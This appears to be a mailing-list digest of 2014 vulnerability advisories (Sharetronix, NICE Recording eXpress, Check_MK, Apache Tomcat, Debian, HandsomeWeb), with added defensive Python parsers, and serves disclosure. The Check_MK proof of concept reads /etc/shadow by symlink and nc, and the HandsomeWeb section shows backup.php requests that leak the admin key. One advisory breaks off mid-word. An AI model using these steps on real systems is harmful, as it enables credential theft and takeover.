Multiple vulnerabilities in Sharetronix

2014-05-28 Thread High-Tech Bridge Security Research
Advisory ID: HTB23214
Product: Sharetronix
Vendor: Blogtronix, LLC
Vulnerable Version(s): 3.3 and probably prior
Tested Version: 3.3
Advisory Publication:  May 7, 2014  [without technical details]
Vendor Notification: May 7, 2014 
Vendor Patch: May 27, 2014 
Public Disclosure: May 28, 2014 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2014-3414, CVE-2014-3415
Risk Level: High 
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/)

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in 
Sharetronix, which can be exploited to perform SQL injection and Cross-Site 
Request Forgery (CSRF) attacks against the vulnerable application. A remote hacker 
can gain full control over the application. 


1) SQL Injection in Sharetronix: CVE-2014-3415

Input passed via the "invite_users[]" HTTP POST parameter to the 
"/[group_name]/invite" URI is not properly sanitised before being used in an SQL 
query. A remote attacker can send a specially crafted HTTP POST request and 
execute arbitrary SQL commands in the application's database.

The following exploit code creates a file "file.php" within the home 
directory of the MySQL server, containing the output of the "phpinfo()" PHP function:


[HTML form (method="post", name="main") targeting http://[host]/[group_name]/invite; the form body was stripped during extraction]

The attacker must be registered and logged-in (the registration is open by 
default). The attacker also must initially create a group (action allowed by 
default), in our example the group name is "group_name".


2) Cross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414

The vulnerability exists due to insufficient validation of the HTTP request origin. 
A remote attacker can trick a logged-in administrator into opening a web page with a 
CSRF exploit and granting administrative privileges to an arbitrary existing user of 
the vulnerable application. Registration is open by default. 

The following CSRF exploit grants administrative privileges to the user 
"username":


[HTML form (method="post", name="main") targeting http://[host]/admin/administrators, auto-submitted via document.main.submit(); the form fields were stripped during extraction]


---

Solution:

Update to Sharetronix 3.4

More Information:
http://developer.sharetronix.com/download

---

References:

[1] High-Tech Bridge Advisory HTB23214 - 
https://www.htbridge.com/advisory/HTB23214 - Multiple vulnerabilities in 
Sharetronix.
[2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social 
Network for Your Company.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



SEC Consult SA-20140528-0 :: Root Backdoor & Unauthenticated access to voice recordings in NICE Recording eXpress

2014-05-28 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20140528-0 >
=======================================================================
              title: Root Backdoor & Unauthenticated access to voice recordings
            product: NICE Recording eXpress voice recording solution
                     (formerly called Cybertech eXpress, Cybertech Myracle
                     maybe affected too)
 vulnerable version: 6.0.x, 6.1.x, 6.2.x, 6.3.x, 6.5.x
      fixed version: see section "Solution" and "Timeline" below
             impact: critical
           homepage: http://www.nice.com
              found: 2013-11-13
                 by: Johannes Greil, Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor & product description:
-----------------------------
"NICE Systems (NASDAQ: NICE), is the worldwide leader of intent-based solutions
that capture and analyze interactions and transactions, realize intent, and
extract and leverage insights to deliver impact in real time."

source: http://www.nice.com/company-overview


"NICE provides Law Enforcement Agencies (LEAs) with mission-critical lawful
interception (LI) solutions to support the fight against organized crime, drug
trafficking and terrorist activities. NICE helps LEAs stay up-to-date with
fast-paced technology developments. The solutions retrieve target location,
relations and conversation content from any type of communication including
fax, fixed and mobile telephony, and Internet applications, resulting in a
multi-dimensional investigative picture. NICE solutions support the entire
lawful interception cycle, from warrant initiation to court evidence
presentation."

source: http://www.nice.com/lea


"NICE Recording eXpress is designed specifically for the audio recording needs
of the small and medium sized Public Safety organisation. This advanced
recording solution offers a comprehensive, advanced, easy-to-install and
affordable platform built for the Public Safety environment and Command and
Control operations delivering optimal recording functionality and quality
management."

Source:
http://www.nice.com/sites/default/files/nicerecordingexpress050112.pdf.pdf.pdf


Business recommendation:
------------------------
Attackers are able to completely compromise the voice recording / surveillance
solution as they can gain access to the system and database level and listen to
recorded calls without prior authentication.

Furthermore, attackers would be able to use the voice recording server as a
jumphost for further attacks against the internal voice VLAN, depending on the
network setup.

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

It is assumed that further critical vulnerabilities exist.


Vulnerability overview/description:
-----------------------------------
Summary:
1) root backdoor account
   (REC-5180 SR1093984 - subtask REC-5424)

2) Unauthenticated access to sensitive files & voice recordings
   (REC-5179 SR1089608 - subtask REC-5417)

3) Low-privileged users can access other voice recordings & Insufficient
   authorization
   (REC-5179 SR1089608 - subtask REC-5418)

4) Unauthenticated access to functionality
   (REC-5179 SR1089608 - subtask REC-5419)

5) Insufficient authorization of admin functions
   (REC-5179 SR1089608 - subtask REC-5420)

6) Multiple cross site scripting issues
   (REC-5181 SR1093986 - subtask REC-5421)

7) Multiple unauthenticated SQL injection issues
   (REC-5180 SR1093984 - subtask REC-5423)

8) Insecure cookie handling
   (REC-5181 SR1093986 - subtask REC-5422)

9) Violation of least privilege principle - services run as SYSTEM
   (not included in subtask)

The strings in parentheses in the vulnerability titles are the official NICE bug
tracking numbers, which are also referenced in their release notes.


1) root backdoor account (REC-5180 SR1093984 - subtask REC-5424)
----------------------------------------------------------------
The MySQL database table "usr" contains a "root" user with USRKEY / user id 1
and administrative access rights. This user account does NOT show up within
the "user administration" menu when logged in with an administrator user account in
the web interface. Hence the password can't be changed there.

As a side note: password hashes are shown for each user within the HTML source
code of the user administration menu.


2) Unauthenticated access to sensitive files & voice recordings (REC-5179
SR1089608 - subtask REC-5417)
----------------------------------------------------------------
For example, unauthenticated attackers are able to gain access to e

LSE Leading Security Experts GmbH - LSE-2014-05-21 - Check_MK - Arbitrary File Disclosure Vulnerability

2014-05-28 Thread LSE Leading Security Experts GmbH (Security Advisories)


=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===

Check_MK - Arbitrary File Disclosure Vulnerability
--------------------------------------------------

Affected Versions
=================
Linux versions of Check_MK equal to or greater than commit
7e9088c09963cb2e76030e8b645607692ec56011, up to Release v1.2.5i2p1.

Other platforms are not affected as the vulnerable feature is not
implemented there.

Issue Overview
==============
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
  Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243

Issue Description
=================
While conducting a whitebox test, LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. It does not check whether the files are symbolic or hard
filesystem links.

As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.

The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:

<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther 
Date:   Thu Sep 5 15:49:46 2013 +0200

mk-job: /var/lib/check_mk_agent/job directory is now
created with mode 1777 so mk-job can be used by
unprivileged users too: fixing bug #1040
<<>>

The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:

<<>>
# Get statistics about monitored jobs
if cd /var/lib/check_mk_agent/job; then
    # section header of the agent output; the tag was stripped by extraction
    echo '<<<job>>>'
    # dumps every file in the directory, following symlinks and hard links
    head -n -0 -v *
fi
<<>>

Impact
======
A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job" pointing to a file he normally would
not have access to, such as "/etc/shadow". The agent expects output from
jobs run with the mk-job tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to remove the write
permissions and the sticky bit for non root users temporarily by
setting mode 755 on the directory.

Proof of Concept
================
[myhost]$ pwd
/var/lib/check_mk_agent/job
[myhost]$ ls -l
total 0
[myhost]$ ln -s /etc/shadow
[myhost]$ ls -la
total 4
drwxrwxrwt 2 root   root4096 May 21 15:17 .
drwxr-xr-x 3 root   root4096 Feb 26 13:54 ..
lrwxrwxrwx 1 myuser mygroup   11 May 21 15:17 shadow -> /etc/shadow
[myhost]$ nc 127.0.0.1 6556
[...]
<<<job>>>
==> shadow <==
root:$6$[...]:16133:0:9:7:::
bin:*:15937:0:9:7:::
daemon:*:15937:0:9:7:::
adm:*:15937:0:9:7:::
lp:*:15937:0:9:7:::
sync:*:15937:0:9:7:::
shutdown:*:15937:0:9:7:::
halt:*:15937:0:9:7:::
mail:*:15937:0:9:7:::
uucp:*:15937:0:9:7:::
operator:*:15937:0:9:7:::
games:*:15937:0:9:7:::
gopher:*:15937:0:9:7:::
ftp:*:15937:0:9:7:::
nobody:*:15937:0:9:7:::
[...]

History
=======
2014-05-20  Issue discovery
2014-05-21  Permission of customer for advisory
2014-05-21  Vendor informed
2014-05-22  CVE requested
2014-05-22  Vendor response
2014-05-22  CVE-2014-0243 assigned
2014-05-26  Official fix available
2014-05-27  Advisory release

-- 
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther
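Added illustration, not the Check_MK agent's or LSE's code: a Python reader for the job directory that applies the checks the shell snippet in the advisory omits (refuse symlinks with O_NOFOLLOW, then refuse non-regular files and hard links after fstat). The directory layout that demo_layout() builds is constructed; the file named "shadow" stands in for the /etc/shadow symlink of the proof of concept.

```python
"""Read job result files from a world-writable (mode 1777) job directory
without following links.

Added illustration of the checks missing from the agent snippet in the
advisory; this is not the Check_MK agent's code. The directory layout built
by demo_layout() is constructed for the demonstration."""
import os
import stat
import tempfile


def read_job_results(job_dir, max_bytes=1 << 20):
    """Return (results, skipped): results maps file name -> text for plain
    files that are safe to read; skipped maps file name -> reason."""
    results, skipped = {}, {}
    dir_fd = os.open(job_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for name in sorted(os.listdir(dir_fd)):
            # O_NOFOLLOW makes the kernel refuse a symlink in the final path
            # component (ELOOP), so "ln -s /etc/shadow" is never opened.
            # O_NONBLOCK keeps an open() on a FIFO from hanging the reader.
            try:
                fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK,
                             dir_fd=dir_fd)
            except OSError as exc:
                skipped[name] = "open refused: %s" % exc.strerror
                continue
            try:
                st = os.fstat(fd)  # inspect the object that was actually opened
                if not stat.S_ISREG(st.st_mode):
                    skipped[name] = "not a regular file"   # device, FIFO, dir
                elif st.st_nlink > 1:
                    # A hard link carries no symlink to detect; the extra link
                    # count is the only hint that the data also lives elsewhere.
                    skipped[name] = "hard link"
                elif st.st_size > max_bytes:
                    skipped[name] = "too large"
                else:
                    with os.fdopen(fd, "rb", closefd=False) as fh:
                        results[name] = fh.read(max_bytes).decode("utf-8", "replace")
            finally:
                os.close(fd)
    finally:
        os.close(dir_fd)
    return results, skipped


def demo_layout():
    """Build a constructed 1777 job directory holding one genuine job result,
    a symlink to a file outside the directory and a hard link to that file,
    then read it with read_job_results()."""
    base = tempfile.mkdtemp()
    job_dir = os.path.join(base, "job")
    os.mkdir(job_dir)
    os.chmod(job_dir, 0o1777)
    secret = os.path.join(base, "secret")  # stands in for /etc/shadow
    with open(secret, "w") as fh:
        fh.write("constructed secret data\n")
    with open(os.path.join(job_dir, "backup"), "w") as fh:
        fh.write("start_time 1400000000\nexit_code 0\n")
    os.symlink(secret, os.path.join(job_dir, "shadow"))
    try:
        os.link(secret, os.path.join(job_dir, "shadow-hardlink"))
    except OSError:
        pass  # hard links may be disallowed on this filesystem
    return read_job_results(job_dir)


if __name__ == "__main__":
    found, refused = demo_layout()
    print("served:", sorted(found))
    print("refused:", refused)
```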



[SECURITY] [DSA 2938-1] Availability of LTS support for Debian 6.0 / squeeze

2014-05-28 Thread Moritz Muehlenhoff

-------------------------------------------------------------------------
Debian Security Advisory DSA-2938-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
May 27, 2014                          http://www.debian.org/security/faq
-------------------------------------------------------------------------

The initial organisation and setup of Squeeze LTS has now happened and 
it is ready for taking over security support once the standard security 
support ends at the end of the month:


Information for users
=====================

Support for Squeeze LTS will end five years after the release of Squeeze, 
i.e. on the 6th of February 2016.

You need to enable the apt sources for squeeze-lts manually. 
Information on how to do this can be found at
https://wiki.debian.org/LTS/Development#Add_squeeze-lts_to_your_sources.list

You should also subscribe to the new announcement mailing list for 
security updates for squeeze-lts:
https://lists.debian.org/debian-lts-announce/

A few packages are not covered by the Squeeze LTS support. These can be
detected with the new tool debian-security-support. Information on how
to run it can be found here:
https://wiki.debian.org/LTS/Development#Check_for_unsupported_packages

If debian-security-support detects an unsupported package which is 
critical to you, please get in touch with debian-...@lists.debian.org
(see below).

squeeze-backports will continue to be supported for the lifetime of 
Squeeze LTS.



Information for Debian maintainers
==================================

First of all, Debian package maintainers are not expected to work on 
updates of their packages for squeeze-lts. Package updates for 
squeeze-lts will be handled by the Debian LTS team.

However, if you _are_ interested in doing so (and the maintainer always
knows best on a package), you're certainly welcome to do so; everyone
in the Debian.org and Debian maintainers key ring can upload to the 
squeeze-lts suite. Information on how to upload a fixed package can 
be found at https://wiki.debian.org/LTS/Development#Upload_Packages



Mailing lists
=============

The whole coordination of the Debian LTS effort is handled through the
debian-lts mailing list: https://lists.debian.org/debian-lts/

Please subscribe or follow us via GMANE (gmane.linux.debian.devel.lts)

Aside from the debian-lts-announce list, there's also a list for 
following all uploads in debian-lts: 
https://lists.debian.org/debian-lts-changes/



Security Tracker
================

All information on the status of vulnerabilities (e.g. if the version in 
squeeze-lts happens to be unaffected while wheezy is affected) will be 
tracked in the Debian Security Tracker:  

http://security-tracker.debian.org

If you happen to spot an error in the data, please see 
https://security-tracker.debian.org/tracker/data/report


Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2937-1] mod-wsgi security update

2014-05-28 Thread Moritz Muehlenhoff

-------------------------------------------------------------------------
Debian Security Advisory DSA-2937-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
May 27, 2014                          http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: mod-wsgi
CVE ID : CVE-2014-0240 CVE-2014-0242

Two security issues have been found in the Python WSGI adapter module 
for Apache:

CVE-2014-0240

Robert Kisteleki discovered a potential privilege escalation in
daemon mode. This is not exploitable with the kernel used in Debian
7.0/wheezy.

CVE-2014-0242

Buck Golemon discovered that incorrect memory handling could lead to
information disclosure when processing Content-Type headers.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.3-2+deb6u1.

For the stable distribution (wheezy), these problems have been fixed in
version 3.3-4+deb7u1.

For the testing distribution (jessie), these problems have been fixed in
version 3.5-1.

For the unstable distribution (sid), these problems have been fixed in
version 3.5-1.

We recommend that you upgrade your mod-wsgi packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: [SECURITY] CVE-2014-0099 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CORRECTION: This is CVE-2014-0099 *NOT* -0097
Apologies for the typo

On 27/05/2014 13:46, Mark Thomas wrote:
> CVE-2014-0099 Information Disclosure
> 
> Severity: Important
> 
> Vendor: The Apache Software Foundation
> 
> Versions Affected:
> - Apache Tomcat 8.0.0-RC1 to 8.0.3
> - Apache Tomcat 7.0.0 to 7.0.52
> - Apache Tomcat 6.0.0 to 6.0.39
> 
> Description:
> The code used to parse the request content length header did not check
> for overflow in the result. This exposed a request smuggling
> vulnerability when Tomcat was located behind a reverse proxy that
> correctly processed the content length header.
> 
> Mitigation:
> Users of affected versions should apply one of the following mitigations
> - Upgrade to Apache Tomcat 8.0.5 or later
>   (8.0.4 contains the fix but was not released)
> - Upgrade to Apache Tomcat 7.0.53 or later
> - Upgrade to Apache Tomcat 6.0.41 or later
>   (6.0.40 contains the fix but was not released)
> 
> Credit:
> A test case that demonstrated the parsing bug was sent to the Tomcat
> security team but no context was provided. The security implications
> were identified by the Tomcat security team.
> 
> References:
> [1] http://tomcat.apache.org/security-8.html
> [2] http://tomcat.apache.org/security-7.html
> [3] http://tomcat.apache.org/security-6.html
> 



[SECURITY] CVE-2014-0119 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0119 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.5
- Apache Tomcat 7.0.0 to 7.0.53
- Apache Tomcat 6.0.0 to 6.0.39

Description:
In limited circumstances it was possible for a malicious web application
to replace the XML parsers used by Tomcat to process XSLTs for the
default servlet, JSP documents, tag library descriptors (TLDs) and tag
plugin configuration files. The injected XML parser(s) could then bypass
the limits imposed on XML external entities and/or have visibility of
the XML files processed for other web applications deployed on the same
Tomcat instance.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.8 or later
  (8.0.6 and 8.0.7 contain the fix but were not released)
- Upgrade to Apache Tomcat 7.0.54 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


CVE-2014-3445 - Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages

2014-05-28 Thread Portcullis Advisories
Vulnerability title: Unauthenticated Backup and Password Disclosure in
HandsomeWeb SOS Webpages
CVE: CVE-2014-3445
Vendor: HandsomeWeb
Product: SOS Webpages
Affected version: 1.1.11 and earlier
Fixed version: 1.1.12
Reported by: Freakyclown

Details:

The default setup allows an unauthenticated user to access
administrative functions such as backing up of key files within the CMS.
This is done by appending the following to a domain using the software
affected.

/backup.php?a=2&k=6f15afa1ac4edea0g145e884116334b7

Where "a" is the file number to back up and "k" is the MD5 key used to
authenticate the administrator. However, if "k" does not match the
correct key, rather than disallowing the unauthenticated user from backing up
the file, the service provides the user with the correct key. For
example:

Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5

Using this new key in the URL, such as below:
/backup.php?a=2&k=5f17aca1ae2edea0f145e884116371a5

will allow the user to perform the backup of files.

In addition to this the key is generated by the code:
$backupkey=MD5

Making it trivial to decrypt the key provided above to gain the
administrator's password and gain further control over the site.


Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


[SECURITY] CVE-2014-0097 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0097 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The code used to parse the request content length header did not check
for overflow in the result. This exposed a request smuggling
vulnerability when Tomcat was located behind a reverse proxy that
correctly processed the content length header.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
A test case that demonstrated the parsing bug was sent to the Tomcat
security team but no context was provided. The security implications
were identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


[SECURITY] CVE-2014-0095 Apache Tomcat denial of service

2014-05-28 Thread Mark Thomas
CVE-2014-0095 Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC2 to 8.0.3

Description:
A regression was introduced in revision 1519838 that caused AJP
requests to hang if an explicit content length of zero was set on the
request. The hanging request consumed a request processing thread which
could lead to a denial of service.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)

Credit:
This issue was reported as a possible bug via the Tomcat users mailing
list and the security implications were identified by the Tomcat security
team.

References:
[1] http://tomcat.apache.org/security-8.html


[SECURITY] CVE-2014-0096 Apache Tomcat information disclosure

2014-05-28 Thread Mark Thomas
CVE-2014-0096 Information Disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
The default servlet allows web applications to define (at multiple
levels) an XSLT to be used to format a directory listing. When running
under a security manager, the processing of these was not subject to the
same constraints as the web application. This enabled a malicious web
application to bypass the file access constraints imposed by the
security manager via the use of external XML entities.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was identified by the Tomcat security team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html


[SECURITY] CVE-2014-0075 Apache Tomcat denial of service

2014-05-28 Thread Mark Thomas
CVE-2014-0075 Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat 8.0.0-RC1 to 8.0.3
- Apache Tomcat 7.0.0 to 7.0.52
- Apache Tomcat 6.0.0 to 6.0.39

Description:
It was possible to craft a malformed chunk size as part of a chunked
request that enabled an unlimited amount of data to be streamed to the
server, bypassing the various size limits enforced on a request. This
enabled a denial of service attack.

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to Apache Tomcat 8.0.5 or later
  (8.0.4 contains the fix but was not released)
- Upgrade to Apache Tomcat 7.0.53 or later
- Upgrade to Apache Tomcat 6.0.41 or later
  (6.0.40 contains the fix but was not released)

Credit:
This issue was reported to the Tomcat security team by David Jorm of the
Red Hat Security Response Team.

References:
[1] http://tomcat.apache.org/security-8.html
[2] http://tomcat.apache.org/security-7.html
[3] http://tomcat.apache.org/security-6.html
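Added illustration for the two parsing defects described in this thread, CVE-2014-0099/0097 (unchecked overflow in the Content-Length parser) and CVE-2014-0075 (malformed chunk size); this is not Tomcat's code. It assumes a signed 64-bit long for Content-Length and a signed 32-bit int for a single chunk size, and shows the wrapping accumulation beside checked parsers that reject such input.

```python
"""Overflow-safe parsing of the HTTP Content-Length header and of a
chunked-encoding size line.

Added illustration for CVE-2014-0099/0097 and CVE-2014-0075; not Tomcat's
code. Limits are assumptions: a Java long for Content-Length, a Java int
for a chunk size."""

MAX_LONG = 2**63 - 1   # assumed: Content-Length is held in a signed 64-bit long
MAX_INT = 2**31 - 1    # assumed: a chunk size is held in a signed 32-bit int
MASK64 = 2**64 - 1


def wrapping_parse_long(digits):
    """Unchecked accumulation in 64-bit two's-complement arithmetic, the
    pattern the advisory describes ('did not check for overflow in the
    result'). Returns the value such a parser would silently end up with."""
    if not digits or not digits.isdigit():
        raise ValueError("not a decimal number")
    result = 0
    for ch in digits:
        result = (result * 10 + (ord(ch) - ord("0"))) & MASK64
    return result - 2**64 if result > MAX_LONG else result  # as signed 64-bit


def parse_content_length(value):
    """Checked parser: ASCII digits only (surrounding header whitespace
    trimmed), no sign, and overflow rejected before the value can wrap.
    Raises ValueError so the caller can answer 400 instead of reading a
    body length that differs from what a front-end proxy computed."""
    value = value.strip()
    if not value or not all("0" <= c <= "9" for c in value):
        raise ValueError("Content-Length must be one or more ASCII digits")
    result = 0
    for ch in value:
        digit = ord(ch) - ord("0")
        if result > (MAX_LONG - digit) // 10:  # result*10+digit would exceed MAX_LONG
            raise ValueError("Content-Length overflows the 64-bit signed range")
        result = result * 10 + digit
    return result


def parse_chunk_size(line):
    """Checked parser for a chunk-size line such as '1a;name=value'. Only hex
    digits are accepted before the optional ';' extension, and the value is
    rejected as soon as it exceeds MAX_INT, so no digit string, however long,
    yields a size the request size limits cannot account for."""
    size_part = line.split(";", 1)[0]
    if not size_part or any(c not in "0123456789abcdefABCDEF" for c in size_part):
        raise ValueError("chunk size must be one or more hex digits")
    result = 0
    for ch in size_part:
        result = result * 16 + int(ch, 16)
        if result > MAX_INT:
            raise ValueError("chunk size exceeds the permitted maximum")
    return result


def parsers_disagree(value):
    """True when the checked parser rejects a Content-Length that a wrapping
    parser accepts as some non-negative length: the condition under which a
    proxy and the back-end would read different body lengths."""
    try:
        parse_content_length(value)
        return False
    except ValueError:
        try:
            return wrapping_parse_long(value) >= 0
        except ValueError:
            return False


def is_rejected(parser, value):
    """True if parser raises ValueError for value."""
    try:
        parser(value)
    except ValueError:
        return True
    return False
```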